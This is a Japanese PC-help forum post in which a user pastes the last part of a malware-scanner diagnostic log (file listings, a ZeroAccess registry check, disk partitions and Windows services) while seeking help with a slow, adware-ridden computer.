[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-delayload-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-delayload-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-debug-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-debug-l1-1-0.dll
[2015/04/17 22:25:48 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
[2015/04/17 22:25:48 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-security-base-l1-1-0.dll
[2015/04/17 22:25:48 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
[2015/04/17 22:25:48 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-localization-l1-1-0.dll
[2015/04/17 22:25:48 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-localization-l1-1-0.dll
[2015/04/17 22:25:48 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
[2015/04/17 22:25:48 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-libraryloader-l1-1-0.dll
[2015/04/17 22:25:48 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
[2015/04/17 22:25:48 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-datetime-l1-1-0.dll
[2015/04/17 22:25:48 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-datetime-l1-1-0.dll
[2015/04/17 22:25:47 | 000,007,680 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\instnm.exe
[2015/04/17 22:25:47 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\apisetschema.dll
[2015/04/17 22:25:47 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\apisetschema.dll
[2015/04/17 22:25:47 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-console-l1-1-0.dll
[2015/04/17 22:25:47 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-console-l1-1-0.dll
[2015/04/17 22:25:47 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\user.exe
[2015/04/17 22:25:46 | 000,686,080 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\adtschema.dll
[2015/04/17 22:25:46 | 000,686,080 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\adtschema.dll
[2015/04/17 22:25:46 | 000,146,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msaudite.dll
[2015/04/17 22:25:46 | 000,146,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msaudite.dll
[2015/04/17 22:25:46 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msobjs.dll
[2015/04/17 22:25:46 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msobjs.dll
[2015/04/17 22:24:56 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ieetwproxystub.dll
[2015/04/17 22:24:55 | 000,114,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieetwcollector.exe
[2015/04/17 22:24:55 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieetwproxystub.dll
[2015/04/17 22:24:55 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\iernonce.dll
[2015/04/17 22:24:54 | 000,076,288 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mshtmled.dll
[2015/04/17 22:24:54 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MshtmlDac.dll
[2015/04/17 22:24:52 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ie4uinit.exe
[2015/04/17 22:24:52 | 000,034,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iernonce.dll
[2015/04/17 22:24:51 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\JavaScriptCollectionAgent.dll
[2015/04/17 22:24:48 | 000,077,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\JavaScriptCollectionAgent.dll
[2015/04/17 22:24:46 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ieapfltr.dll
[2015/04/17 22:24:46 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\iesetup.dll
[2015/04/17 22:24:44 | 002,052,608 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\inetcpl.cpl
[2015/04/17 22:24:44 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieetwcollectorres.dll
[2015/04/17 22:24:43 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\jscript9diag.dll
[2015/04/17 22:24:43 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ieUnatt.exe
[2015/04/17 22:24:41 | 000,968,704 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MsSpellCheckingFacility.exe
[2015/04/17 22:24:40 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msfeeds.dll
[2015/04/17 22:24:40 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ieui.dll
[2015/04/17 22:24:40 | 000,316,928 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxtrans.dll
[2015/04/17 22:24:39 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieapfltr.dll
[2015/04/17 22:24:39 | 000,066,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iesetup.dll
[2015/04/17 22:24:38 | 002,125,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\inetcpl.cpl
[2015/04/17 22:24:38 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mshtmlmedia.dll
[2015/04/17 22:24:36 | 000,144,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieUnatt.exe
[2015/04/17 22:24:35 | 000,340,992 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\html.iec
[2015/04/17 22:24:35 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msrating.dll
[2015/04/17 22:24:33 | 000,633,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieui.dll
[2015/04/17 22:24:33 | 000,490,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxtmsft.dll
[2015/04/17 22:24:32 | 001,359,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mshtmlmedia.dll
[2015/04/17 22:24:32 | 000,814,080 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\jscript9diag.dll
[2015/04/17 22:24:32 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mshtmled.dll
[2015/04/17 22:24:31 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\jscript9.dll
[2015/04/17 22:24:31 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\vbscript.dll
[2015/04/17 22:24:30 | 000,417,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\html.iec
[2015/04/17 22:24:30 | 000,088,064 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MshtmlDac.dll
[2015/04/17 22:24:29 | 000,199,680 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msrating.dll
[2015/04/17 22:22:18 | 000,079,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\clfsw32.dll
[2015/04/17 22:22:16 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\clfsw32.dll
[2015/04/05 14:22:39 | 000,000,000 | --SD | C] -- C:\windows\SysWow64\GWX
[2015/04/05 14:22:38 | 000,000,000 | --SD | C] -- C:\windows\SysNative\GWX
[5 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ]
[1 C:\windows\*.tmp files -> C:\windows\*.tmp -> ]
  • T・T
  • 2015/04/30 (Thu) 21:29:33
Re: パソコン動作緩慢・広告類がひどい
これで最後です

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/30 20:59:41 | 001,343,998 | ---- | M] () -- C:\windows\SysNative\PerfStringBackup.INI
[2015/04/30 20:59:41 | 000,665,892 | ---- | M] () -- C:\windows\SysNative\perfh009.dat
[2015/04/30 20:59:41 | 000,422,840 | ---- | M] () -- C:\windows\SysNative\perfh011.dat
[2015/04/30 20:59:41 | 000,126,194 | ---- | M] () -- C:\windows\SysNative\perfc011.dat
[2015/04/30 20:59:41 | 000,126,104 | ---- | M] () -- C:\windows\SysNative\perfc009.dat
[2015/04/30 20:59:13 | 000,024,912 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/04/30 20:59:13 | 000,024,912 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/04/30 20:56:15 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\MBAMSwissArmy.sys
[2015/04/30 20:52:59 | 000,000,684 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/30 20:51:59 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat
[2015/04/30 20:51:31 | 3155,054,592 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/30 14:27:00 | 000,000,626 | ---- | M] () -- C:\windows\tasks\Adobe Flash Player Updater.job
[2015/04/30 14:16:00 | 000,000,688 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/29 23:30:18 | 000,000,617 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/29 23:03:47 | 002,224,640 | ---- | M] () -- C:\Users\Owner\Desktop\adwcleaner_4.202.exe
[2015/04/29 15:34:46 | 000,004,566 | ---- | M] () -- C:\Users\Owner\Documents\cc_20150429_153441.reg
[2015/04/27 22:36:43 | 000,778,416 | ---- | M] (Adobe Systems Incorporated) -- C:\windows\SysWow64\FlashPlayerApp.exe
[2015/04/27 22:36:43 | 000,142,512 | ---- | M] (Adobe Systems Incorporated) -- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/27 22:15:55 | 000,001,389 | ---- | M] () -- C:\Users\Public\Desktop\セキュリティ対策ツール.lnk
[2015/04/27 22:13:09 | 000,000,056 | ---- | M] () -- C:\windows\SysNative\SupportTool.exe.bat
[2015/04/27 21:43:08 | 000,001,112 | ---- | M] () -- C:\Users\Owner\Desktop\セキュリティ申込・設定ツール.lnk
[2015/04/27 18:59:09 | 000,000,833 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/18 00:47:37 | 001,323,782 | ---- | M] () -- C:\windows\SysWow64\PerfStringBackup.INI
[2015/04/15 14:28:05 | 000,000,000 | ---- | M] () -- C:\Users\Owner\AppData\Local\{9D523E23-973D-46AB-8BF4-ECE28E69ED4D}
[2015/04/06 19:45:55 | 000,236,080 | ---- | M] (Trend Micro Inc.) -- C:\windows\RegBootClean64.exe
[2015/04/03 10:09:05 | 000,025,136 | ---- | M] (Trend Micro Inc.) -- C:\windows\DCEBoot64.exe
[5 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ]
[1 C:\windows\*.tmp files -> C:\windows\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/29 23:24:05 | 000,000,617 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/29 23:03:43 | 002,224,640 | ---- | C] () -- C:\Users\Owner\Desktop\adwcleaner_4.202.exe
[2015/04/29 15:34:44 | 000,004,566 | ---- | C] () -- C:\Users\Owner\Documents\cc_20150429_153441.reg
[2015/04/27 22:15:55 | 000,001,389 | ---- | C] () -- C:\Users\Public\Desktop\セキュリティ対策ツール.lnk
[2015/04/27 22:13:09 | 000,000,056 | ---- | C] () -- C:\windows\SysNative\SupportTool.exe.bat
[2015/04/27 21:43:07 | 000,001,112 | ---- | C] () -- C:\Users\Owner\Desktop\セキュリティ申込・設定ツール.lnk
[2015/04/27 18:59:09 | 000,000,833 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/17 22:24:55 | 000,016,303 | ---- | C] () -- C:\windows\SysWow64\ieuinit.inf
[2015/04/17 22:24:52 | 000,016,303 | ---- | C] () -- C:\windows\SysNative\ieuinit.inf
[2015/04/15 14:27:05 | 000,000,000 | ---- | C] () -- C:\Users\Owner\AppData\Local\{9D523E23-973D-46AB-8BF4-ECE28E69ED4D}
[2014/06/24 17:50:31 | 000,000,000 | ---- | C] () -- C:\Users\Owner\AppData\Local\{19A5FE08-FE28-4C72-B83B-762CCB6C36FB}
[2014/05/19 17:29:34 | 000,000,993 | ---- | C] () -- C:\windows\UN900119.INI
[2014/04/21 22:45:27 | 000,000,036 | ---- | C] () -- C:\Users\Owner\AppData\Local\housecall.guid.cache
[2014/03/01 14:57:34 | 001,323,782 | ---- | C] () -- C:\windows\SysWow64\PerfStringBackup.INI
[2013/05/29 17:25:42 | 000,450,560 | ---- | C] () -- C:\windows\SysWow64\AscSqlite.dll
[2011/11/22 02:01:35 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2009/07/14 13:55:00 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 14:22:33 | 014,177,280 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 14:26:18 | 012,875,264 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 10:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 12:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 10:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/30 14:27:00 | 000,000,626 | ---- | M] () -- C:\windows\tasks\Adobe Flash Player Updater.job
[2015/04/30 20:52:59 | 000,000,684 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/30 21:16:21 | 000,000,688 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: Hitachi HTS547575A9E384
Partitions: 4
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: Unknown
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 1.00GB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 624.00GB
Starting Offset: 1573912576
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: Extended w/Extended Int 13
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 50.00GB
Starting Offset: 671316180992
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 23.00GB
Starting Offset: 725003272192
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2009/07/14 10:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2013/02/27 14:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2009/07/14 10:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2015/03/17 14:15:55 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/14 10:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2012/07/05 07:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:56 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2015/02/03 12:12:14 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/21 12:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2011/03/03 15:24:16 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/14 10:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2009/07/14 10:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/14 10:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 13:17:27 | 000,303,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2011/05/24 20:42:55 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2012/02/11 15:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:[/b] - [2015/03/17 14:15:55 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2015/03/17 14:15:55 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/21 12:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/21 12:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/19 12:06:55 | 000,210,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2010/11/21 12:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
SRV:[b]64bit:[/b] - [2013/05/27 14:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/21 12:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/25 12:24:41 | 002,553,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\TEMP:373E1720

< End of report >

  • T・T
